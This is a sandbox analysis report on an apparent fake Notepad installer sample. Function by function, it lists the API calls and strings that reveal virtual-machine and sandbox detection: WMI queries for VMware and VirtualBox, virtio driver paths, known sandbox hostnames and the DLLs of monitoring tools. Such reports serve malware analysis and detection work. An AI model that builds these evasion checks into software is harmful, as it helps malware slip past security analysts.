                                      • VariantClear.OLEAUT32(00000008), ref: 006EADC1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: String$AllocFree$ClearVariant$wcscmp
                                      • String ID: A M I$Parallels$ROOT\CIMV2$SELECT * FROM Win32_BIOS$SerialNumber$VMWare$Virtual$Xen
                                      • API String ID: 2949752953-4050143825
                                      • Opcode ID: 73d875611b0374049517e76720f66e7675ef9decb99135317edda999d887c770
                                      • Instruction ID: b8e48a5132e82af150b70cf156535e31be6dc20a917656caf465687c80c05f1d
                                      • Opcode Fuzzy Hash: 73d875611b0374049517e76720f66e7675ef9decb99135317edda999d887c770
                                      • Instruction Fuzzy Hash: 7541F875A01249EFCF00DBD5CC45DEEBBBAEF48705B10015AE606E6260DB71AE41CF61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 006EC6AE
                                        • Part of subcall function 006E98DD: GetModuleHandleA.KERNEL32(kernel32.dll,?,?,006EB5D1), ref: 006E98F3
                                        • Part of subcall function 006E98DD: GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 006E98FF
                                        • Part of subcall function 006E98DD: GetCurrentProcess.KERNEL32(00000000,?,?,006EB5D1), ref: 006E9912
                                      • Wow64DisableWow64FsRedirection.KERNEL32(00000000), ref: 006EC6C1
                                      • PathCombineW.SHLWAPI(?,?,006F68D0,00000000,006EC717), ref: 006EC6DF
                                      • Wow64RevertWow64FsRedirection.KERNEL32(00000000), ref: 006EC70C
                                      Strings
                                      • System32\drivers\vioinput.sys, xrefs: 006EC688
                                      • System32\drivers\viofs.sys, xrefs: 006EC67A
                                      • System32\drivers\balloon.sys, xrefs: 006EC665
                                      • System32\drivers\netkvm.sys, xrefs: 006EC66C
                                      • System32\drivers\viorng.sys, xrefs: 006EC68F
                                      • System32\drivers\vioser.sys, xrefs: 006EC69D
                                      • System32\drivers\vioscsi.sys, xrefs: 006EC696
                                      • System32\drivers\pvpanic.sys, xrefs: 006EC673
                                      • System32\drivers\viogpudo.sys, xrefs: 006EC681
                                      • System32\drivers\viostor.sys, xrefs: 006EC6A4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Wow64$Redirection$AddressCombineCurrentDirectoryDisableHandleModulePathProcProcessRevertWindows
                                      • String ID: System32\drivers\balloon.sys$System32\drivers\netkvm.sys$System32\drivers\pvpanic.sys$System32\drivers\viofs.sys$System32\drivers\viogpudo.sys$System32\drivers\vioinput.sys$System32\drivers\viorng.sys$System32\drivers\vioscsi.sys$System32\drivers\vioser.sys$System32\drivers\viostor.sys
                                      • API String ID: 1174745796-1126929258
                                      • Opcode ID: f7f32bd13bb68aaa5f7cf6b4853ec33a57c17c81131f23449ca063a7fad908f0
                                      • Instruction ID: d359f45d381a399f308ab6c0b88e3e352e161ab2d46d710df33634ef592e983c
                                      • Opcode Fuzzy Hash: f7f32bd13bb68aaa5f7cf6b4853ec33a57c17c81131f23449ca063a7fad908f0
                                      • Instruction Fuzzy Hash: EE116AB1D0134DABCF10EFA1C8889EEBFBAEF04358F105469E615B6210D3749A09CF64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: memcmp
                                      • String ID: $Do$TDo$accept-range$authorizatio$cache-contro$content-rang$if-none-matc$last-modifie$x-reproxy-ur
                                      • API String ID: 1475443563-2093361865
                                      • Opcode ID: 60ccc390938b51bb81e5e728944bf10e7a93ce670c9e64ea92081f9ff57516be
                                      • Instruction ID: 0aa7707c803ad927e4547605bfb74011dcd72b0c7e9cc902aafebf7b72da2a71
                                      • Opcode Fuzzy Hash: 60ccc390938b51bb81e5e728944bf10e7a93ce670c9e64ea92081f9ff57516be
                                      • Instruction Fuzzy Hash: 1C116D0578B3D971E560662B1D02BBB1E4BAB22766F0501B1FF15E97C7EA81CE034186
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 006EA730: malloc.MSVCRT ref: 006EA73E
                                        • Part of subcall function 006EA730: GetComputerNameW.KERNEL32(00000000,00000010), ref: 006EA750
                                        • Part of subcall function 006EA730: ??3@YAXPAX@Z.MSVCRT ref: 006EA75B
                                        • Part of subcall function 006EA76B: GetComputerNameExW.KERNEL32(00000001,00000000,00000000,?,?,?,?,006EA6CE), ref: 006EA783
                                        • Part of subcall function 006EA76B: malloc.MSVCRT ref: 006EA78D
                                        • Part of subcall function 006EA76B: GetComputerNameExW.KERNEL32(00000001,00000000,00000000,?,?,?,006EA6CE), ref: 006EA7A1
                                        • Part of subcall function 006EA76B: ??3@YAXPAX@Z.MSVCRT ref: 006EA7A8
                                      • ??3@YAXPAX@Z.MSVCRT ref: 006EA6D8
                                      • lstrcmpiW.KERNEL32(006F4F90,?), ref: 006EA6F6
                                      • lstrcmpiW.KERNEL32(006F4F90,?), ref: 006EA700
                                      • ??3@YAXPAX@Z.MSVCRT ref: 006EA71F
                                      • ??3@YAXPAX@Z.MSVCRT ref: 006EA724
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ??3@$ComputerName$lstrcmpimalloc
                                      • String ID: 7SILVIA$FORTINET$HANSPETER-PC$JOHN-PC$MUELLER-PC$SANDBOX$TEQUILABOOMBOOM$WIN7-TRAPS
                                      • API String ID: 1785924915-283957803
                                      • Opcode ID: fbe3974c313311dc89754529ab1fc6f637aff40f0d6dda4913b4502b0120998a
                                      • Instruction ID: e654483b249264d0f1b32b9c3cb9bd1ff3a26d7df324bbf7e2f224e559d2da0b
                                      • Opcode Fuzzy Hash: fbe3974c313311dc89754529ab1fc6f637aff40f0d6dda4913b4502b0120998a
                                      • Instruction Fuzzy Hash: 16114C75C02249ABCF00DFE699844EFBFF6FB48314B20406AE504B2210DB716A45DFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetModuleHandleW.KERNEL32(006F4CEC,?,006EA46B), ref: 006EA453
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: HandleModule
                                      • String ID: api_log.dll$avghooka.dll$avghookx.dll$cmdvrt32.dll$cmdvrt64.dll$dbghelp.dll$dir_watch.dll$pstorec.dll$sbiedll.dll$snxhk.dll$vmcheck.dll$wpespy.dll
                                      • API String ID: 4139908857-1599972391
                                      • Opcode ID: 39185b8923eb18d53040d009ad283e37eed0d29584a00d74e9f5367ef903b1d8
                                      • Instruction ID: 5fc2c5afe0e3ab5fb153ebb27e662eb5fde7e43551b4c4a0b27798679379fe98
                                      • Opcode Fuzzy Hash: 39185b8923eb18d53040d009ad283e37eed0d29584a00d74e9f5367ef903b1d8
                                      • Instruction Fuzzy Hash: 190146B090225C9ACB008FCA98495EFFFB6FB40358F116518D6103BA40CBB05A49CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: fread$calloc$fclosemalloc
                                      • String ID:
                                      • API String ID: 2646035366-0
                                      • Opcode ID: a5f636ddabbf71c48d5555a460fb35cbfe25219f68d3dc7d10797edcd0fa45a6
                                      • Instruction ID: d9d86b8fb0151e4f2d6dd6e2cde8c4d87c555c4293bffcd5749d885b4ea02852
                                      • Opcode Fuzzy Hash: a5f636ddabbf71c48d5555a460fb35cbfe25219f68d3dc7d10797edcd0fa45a6
                                      • Instruction Fuzzy Hash: FC71E4B16087019FD710EF66C08461EFBE4AF89754F40882EE9C997391D77AE944CB8A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SysAllocString.OLEAUT32(006E34CD), ref: 006E6A40
                                      • SysAllocString.OLEAUT32(?), ref: 006E6A47
                                      • SysAllocString.OLEAUT32(?), ref: 006E6A4F
                                      • SysAllocString.OLEAUT32(open), ref: 006E6A59
                                      • VariantInit.OLEAUT32(?), ref: 006E6A92
                                      • VariantInit.OLEAUT32(?), ref: 006E6A98
                                      • VariantInit.OLEAUT32(?), ref: 006E6A9E
                                      • SysFreeString.OLEAUT32(00000000), ref: 006E6B11
                                      • SysFreeString.OLEAUT32(00000000), ref: 006E6B24
                                      • SysFreeString.OLEAUT32(00000000), ref: 006E6B2F
                                      • SysFreeString.OLEAUT32(00000000), ref: 006E6B3A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: String$AllocFree$InitVariant
                                      • String ID: open
                                      • API String ID: 1538505634-2758837156
                                      • Opcode ID: 731ec8ac756600484e5daac8bbe8a5f7e438c97ec4b95e628035896a0274bdd9
                                      • Instruction ID: 6e855e53decdbb9e53d63b4256dc56d22bdbdddb7a525374075c5bab6f50069c
                                      • Opcode Fuzzy Hash: 731ec8ac756600484e5daac8bbe8a5f7e438c97ec4b95e628035896a0274bdd9
                                      • Instruction Fuzzy Hash: B4410872D11628EBCF15EFE8DC8559DBBB6BF09350F14052AF900EB220EBB25855CB40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 006E9296: SysAllocString.OLEAUT32(?), ref: 006E92E1
                                        • Part of subcall function 006E9296: SysFreeString.OLEAUT32(?), ref: 006E930E
                                        • Part of subcall function 006E9354: SysAllocString.OLEAUT32(WQL), ref: 006E9365
                                        • Part of subcall function 006E9354: SysAllocString.OLEAUT32(?), ref: 006E936C
                                        • Part of subcall function 006E9354: SysFreeString.OLEAUT32(00000000), ref: 006E93B5
                                        • Part of subcall function 006E9354: SysFreeString.OLEAUT32(00000000), ref: 006E93C0
                                      • StrStrW.SHLWAPI(?,82801FB), ref: 006EB901
                                      • StrStrW.SHLWAPI(?,82441FX), ref: 006EB90F
                                      • StrStrW.SHLWAPI(?,82371SB), ref: 006EB91D
                                      • StrStrW.SHLWAPI(?,OpenHCD), ref: 006EB92B
                                      • VariantClear.OLEAUT32(?), ref: 006EB936
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: String$AllocFree$ClearVariant
                                      • String ID: 82371SB$82441FX$82801FB$Name$OpenHCD$ROOT\CIMV2$SELECT * FROM Win32_PnPEntity
                                      • API String ID: 261499160-1741924195
                                      • Opcode ID: a02f2cc5eba71ef4ac0b61072ea8d99bcbdb51134a160d0a792361d18cd0a978
                                      • Instruction ID: e33f6b834c033259def15301705999b097cd7661d33aa746995456aff2d6ca75
                                      • Opcode Fuzzy Hash: a02f2cc5eba71ef4ac0b61072ea8d99bcbdb51134a160d0a792361d18cd0a978
                                      • Instruction Fuzzy Hash: B7413872901219AFCF00DBA9CC84DEFB7BAEF49700B104165E605E7265D7719E45CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: _assertfread$_strdupcallocmallocstrlen
                                      • String ID: B$io.c$q - p <= tot_len$q - p == tot_len
                                      • API String ID: 835829720-2310581195
                                      • Opcode ID: d0db2be5c5fbd2f7d390cb6c79bdd190cb6ce75fb11b0e0cfd8f111b1cd98210
                                      • Instruction ID: 7834ae578d035c725f40ee2a96df98fc1c140526aa4e0dcc43f4c88cc89e0ad0
                                      • Opcode Fuzzy Hash: d0db2be5c5fbd2f7d390cb6c79bdd190cb6ce75fb11b0e0cfd8f111b1cd98210
                                      • Instruction Fuzzy Hash: 4F4107B16087159FC700EF29C48065FBBE4BF88358F45893EF9C8A7341D77999498B8A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetModuleHandleA.KERNEL32(ntdll.dll,?,?,?,006EF519), ref: 006F1C71
                                      • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 006F1C81
                                      • GetProcAddress.KERNEL32(00000000,NtDeviceIoControlFile), ref: 006F1C8E
                                      • GetModuleHandleA.KERNEL32(kernel32.dll,?,?,?,006EF519), ref: 006F1C9A
                                      • GetProcAddress.KERNEL32(00000000,SetFileCompletionNotificationModes), ref: 006F1CA4
                                      • GetProcAddress.KERNEL32(00000000,CancelIoEx), ref: 006F1CB1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$HandleModule
                                      • String ID: CancelIoEx$NtDeviceIoControlFile$RtlNtStatusToDosError$SetFileCompletionNotificationModes$kernel32.dll$ntdll.dll
                                      • API String ID: 667068680-3528419419
                                      • Opcode ID: 89714222d9f26c8ed531766802198eddd904fe8563e252a1f5107bc52ad36d96
                                      • Instruction ID: aef3dfb06f99d8a49771045ac9179a8e290c0368048e4edae06ed911fdceddf3
                                      • Opcode Fuzzy Hash: 89714222d9f26c8ed531766802198eddd904fe8563e252a1f5107bc52ad36d96
                                      • Instruction Fuzzy Hash: 22E0C0B1A403296A87006BB6AC49C37AEAFED947663421427F608D3661D6B45410CEA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: memcmp
                                      • String ID: ,Co$<Co$accept-encodin$accept-languag$dCo$x-compress-hin$x-forwarded-fo$x-frame-option
                                      • API String ID: 1475443563-3629954870
                                      • Opcode ID: 38a92a1ddb99d230190f9a2bf3d97e96233363a5e270e0293cf79c04b407176e
                                      • Instruction ID: 90fdbbb26de1f950fdafbe06a2fd488814475662fc898c8a8d7b12c39a9d0772
                                      • Opcode Fuzzy Hash: 38a92a1ddb99d230190f9a2bf3d97e96233363a5e270e0293cf79c04b407176e
                                      • Instruction Fuzzy Hash: 2801784579A3CA31E6746A2B5D02BB71D0BAB20BA6F0509B5FF14EC7C6E982CD434111
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: memcmp
                                      • String ID: (Eo$<Eo$content-encodin$content-languag$content-locatio$tCo$www-authenticat$x-xss-protectio
                                      • API String ID: 1475443563-2250256078
                                      • Opcode ID: 587adf6817f7215e48e36ff344912a73ce007e4fc5a212454227e24ea10f1e4f
                                      • Instruction ID: 90dd8a6872a3ac8f973108cdda69fb56209c5c32a07f31b479450de9fea8eef4
                                      • Opcode Fuzzy Hash: 587adf6817f7215e48e36ff344912a73ce007e4fc5a212454227e24ea10f1e4f
                                      • Instruction Fuzzy Hash: 6001A205B8F7DA31D560142B1D42BBB2D4B9B22766F0104B1FF24E9BCBFA41CE035046
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 006E9296: SysAllocString.OLEAUT32(?), ref: 006E92E1
                                        • Part of subcall function 006E9296: SysFreeString.OLEAUT32(?), ref: 006E930E
                                        • Part of subcall function 006E9354: SysAllocString.OLEAUT32(WQL), ref: 006E9365
                                        • Part of subcall function 006E9354: SysAllocString.OLEAUT32(?), ref: 006E936C
                                        • Part of subcall function 006E9354: SysFreeString.OLEAUT32(00000000), ref: 006E93B5
                                        • Part of subcall function 006E9354: SysFreeString.OLEAUT32(00000000), ref: 006E93C0
                                      • StrStrW.SHLWAPI(?,VirtualBox), ref: 006EBD1D
                                      • VariantClear.OLEAUT32(?), ref: 006EBD2A
                                      • memset.NTDLL ref: 006EBD37
                                      • StrStrW.SHLWAPI(?,Oracle Corporation), ref: 006EBD6F
                                      • VariantClear.OLEAUT32(?), ref: 006EBD7C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: String$AllocFree$ClearVariant$memset
                                      • String ID: Manufacturer$Oracle Corporation$Product$ROOT\CIMV2$SELECT * FROM Win32_BaseBoard$VirtualBox
                                      • API String ID: 3783832041-3002637288
                                      • Opcode ID: a914e9dcc2f29cee96ec7c16c9550b9d394afe492223b5020f0d4ea9edfe652e
                                      • Instruction ID: 4fd5cdc88aa519f9af6791b4a74183564025c08725762294550d3b50fc122c41
                                      • Opcode Fuzzy Hash: a914e9dcc2f29cee96ec7c16c9550b9d394afe492223b5020f0d4ea9edfe652e
                                      • Instruction Fuzzy Hash: 5A41057190135DABCB10DFE6CC889EFBBBAEF48710B145459E601EB250D7709A41CBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 006E9296: SysAllocString.OLEAUT32(?), ref: 006E92E1
                                        • Part of subcall function 006E9296: SysFreeString.OLEAUT32(?), ref: 006E930E
                                        • Part of subcall function 006E9354: SysAllocString.OLEAUT32(WQL), ref: 006E9365
                                        • Part of subcall function 006E9354: SysAllocString.OLEAUT32(?), ref: 006E936C
                                        • Part of subcall function 006E9354: SysFreeString.OLEAUT32(00000000), ref: 006E93B5
                                        • Part of subcall function 006E9354: SysFreeString.OLEAUT32(00000000), ref: 006E93C0
                                      • StrStrIW.SHLWAPI(?,VirtualBox), ref: 006EAEB0
                                      • StrStrIW.SHLWAPI(?,HVM domU), ref: 006EAEBE
                                      • StrStrIW.SHLWAPI(?,VMWare), ref: 006EAECC
                                      • VariantClear.OLEAUT32(00000008), ref: 006EAED6
                                      • VariantClear.OLEAUT32(00000008), ref: 006EAEEC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: String$AllocFree$ClearVariant
                                      • String ID: HVM domU$Model$ROOT\CIMV2$SELECT * FROM Win32_ComputerSystem$VMWare$VirtualBox
                                      • API String ID: 261499160-3582534201
                                      • Opcode ID: 8e837d99ad58064b5f8ae157f9a19ea66f1e3b09e305149c8d2aedcd6af892ff
                                      • Instruction ID: fe780da1437bee4b76e30b2d977ba01f7694b5c759d329426703f5291bc0d3c3
                                      • Opcode Fuzzy Hash: 8e837d99ad58064b5f8ae157f9a19ea66f1e3b09e305149c8d2aedcd6af892ff
                                      • Instruction Fuzzy Hash: F641F772901219EFCB00DBE9CC859EEBBBAEF48714B10405AF605E7250DB71AE45DBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • memcpy.NTDLL(00000000,00000000,?,?,00000001,?,006E4E1F,?,?,?,?,?,006E4E52,?,?,?), ref: 006E5637
                                      • memcpy.NTDLL(00000000,?,?,00000000,00000000,?,?,00000001,?,006E4E1F,?,?,?,?,?,006E4E52), ref: 006E564B
                                      • memcpy.NTDLL(00000000, HTTP/1.1Host: ,00000011,00000000,?,?,00000000,00000000,?,?,00000001,?,006E4E1F,?), ref: 006E565E
                                      • memcpy.NTDLL(00000000,?,?,00000000, HTTP/1.1Host: ,00000011,00000000,?,?,00000000,00000000,?,?,00000001,?,006E4E1F), ref: 006E5670
                                      • memcpy.NTDLL(00000000,00000000,?,?,00000001,?,?,?,?,006E4E52,?,?,?,?,55C3C95E), ref: 006E56BE
                                      • memcpy.NTDLL(?,?,?,?,006E4E52,?,?,?,?,55C3C95E), ref: 006E56D9
                                      • memcpy.NTDLL(00000000,00000000,55C3C95E,?,?,?,?,006E4E52,?,?,?,?,55C3C95E), ref: 006E56F6
                                      • memcpy.NTDLL(00000000,00000000,?,?,00000001,?,?,?,?,006E4E52,?,?,?,?,55C3C95E), ref: 006E5755
                                      • memcpy.NTDLL(?,?,?,?,?,?,006E4E52,?,?,?,?,55C3C95E), ref: 006E5777
                                      • memcpy.NTDLL(?,?,?,?,?,?,?,?,?,006E4E52,?,?,?,?,55C3C95E), ref: 006E5795
                                      • memcpy.NTDLL(?,006F3CF0,00000002,?,?,?,006E4E52,?,?,?,?,55C3C95E), ref: 006E57C3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: memcpy
                                      • String ID: HTTP/1.1Host:
                                      • API String ID: 3510742995-2447342782
                                      • Opcode ID: a4aa6462b7eb2b999c25fc9b770df3a6e28301b5b7ee01ff6bc573fb88a20238
                                      • Instruction ID: 287f9a89577c9811981b495580d96e882e1ae984ad1aacb35a5e93f7039b3b4f
                                      • Opcode Fuzzy Hash: a4aa6462b7eb2b999c25fc9b770df3a6e28301b5b7ee01ff6bc573fb88a20238
                                      • Instruction Fuzzy Hash: 5F616F75500A46EFCF01DF58C885E99BBAAFF14308F544099F8499B217D371EA61CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 006E9296: SysAllocString.OLEAUT32(?), ref: 006E92E1
                                        • Part of subcall function 006E9296: SysFreeString.OLEAUT32(?), ref: 006E930E
                                        • Part of subcall function 006E9354: SysAllocString.OLEAUT32(WQL), ref: 006E9365
                                        • Part of subcall function 006E9354: SysAllocString.OLEAUT32(?), ref: 006E936C
                                        • Part of subcall function 006E9354: SysFreeString.OLEAUT32(00000000), ref: 006E93B5
                                        • Part of subcall function 006E9354: SysFreeString.OLEAUT32(00000000), ref: 006E93C0
                                      • StrStrW.SHLWAPI(?,ACPIBus_BUS_0), ref: 006EBBD7
                                      • StrStrW.SHLWAPI(?,PCI_BUS_0), ref: 006EBBE5
                                      • StrStrW.SHLWAPI(?,PNP_BUS_0), ref: 006EBBF3
                                      • VariantClear.OLEAUT32(?), ref: 006EBC00
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: String$AllocFree$ClearVariant
                                      • String ID: ACPIBus_BUS_0$Name$PCI_BUS_0$PNP_BUS_0$ROOT\CIMV2$SELECT * FROM Win32_Bus
                                      • API String ID: 261499160-4459919
                                      • Opcode ID: 90de20eb5fa85a05a891a4166c51f10025a5e3ba69e750c0686e84f0c2890ef4
                                      • Instruction ID: dc4672bab3ff911a3200dbaa68f01e154e11160a80c7a7c5cd37682e8b9fc8ef
                                      • Opcode Fuzzy Hash: 90de20eb5fa85a05a891a4166c51f10025a5e3ba69e750c0686e84f0c2890ef4
                                      • Instruction Fuzzy Hash: DD4108B6D0121AABCB00DB95CC85DEFB7BAEF48B00F244095E615E7255DB719E41CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: fwrite$fclosefopen
                                      • String ID:
                                      • API String ID: 2063257959-0
                                      • Opcode ID: 0115a404e1b8e991bdb2316a7b23dd672b55659bcbd10aadaa0b4d01aa8b6c09
                                      • Instruction ID: f714504eab1aae642464a440672445ef7d4fc8ae025155dd063f127e432bbfd5
                                      • Opcode Fuzzy Hash: 0115a404e1b8e991bdb2316a7b23dd672b55659bcbd10aadaa0b4d01aa8b6c09
                                      • Instruction Fuzzy Hash: EB51A0B05087019FD710EF26C08461ABBE4AF85718F418C2EE9D9A7381D779E9898B46
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • shutdown.WS2_32(?,00000001), ref: 006F02B2
                                      • WSAGetLastError.WS2_32(?,00000000,?,006EF6BF,00000000,?,00000000,006EF612,00000000,00000000,?,00000000,006E2DE3,?,00000000,?), ref: 006F02C3
                                      • closesocket.WS2_32(?), ref: 006F0339
                                      • UnregisterWait.KERNEL32(?), ref: 006F037E
                                      • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,?,006EF6BF,00000000,?,00000000,006EF612,00000000,00000000,?,00000000,006E2DE3), ref: 006F0398
                                      • ??3@YAXPAX@Z.MSVCRT ref: 006F03BE
                                      • UnregisterWait.KERNEL32(?), ref: 006F03DF
